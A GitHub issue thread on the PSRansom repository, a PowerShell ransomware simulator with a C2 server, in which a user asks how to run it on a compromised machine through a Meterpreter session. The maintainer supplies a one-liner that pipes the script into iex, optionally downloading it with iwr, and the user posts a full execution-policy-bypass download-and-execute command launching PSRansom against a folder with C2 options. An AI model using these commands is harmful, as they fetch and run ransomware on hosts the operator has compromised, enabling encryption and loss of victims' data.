JoelGMSec / PSRansom

PowerShell Ransomware Simulator with C2 Server

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How can i run PSRansom from Meterpreter session

IAMinZoho opened this issue · comments

I want to run PSRansom on a compromised machine to which I have a meterpreter session already established to my C2. I wanted to use IEX to load the PSRansom from raw github page. This is not working. Please help me fix this or if there is a better alternative, please suggest.


You can call any script without function (like PSRansom) doing something like this:

'function PSRansom {' + $data + '}' | iex

Where data is the raw data of the script. Or you can replace data with $(iwr -useb https://raw.github..) if you prefer.

Thanks for using PSRansom :)


I am an amateur. If you can spare some time for me and share the steps on how I can run PSAttack reflectively using a meterpreter shell, then it would awesome. Thanks for sharing the PSAttack on github.

Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString(''));.\PSRansom.ps1 -e C:\Users\Anna\Desktop\New Folder -s -p 80 -x -Demo

This does not work... Please help. Of all the PowerShell based ransomware I tested PSRansome is the best.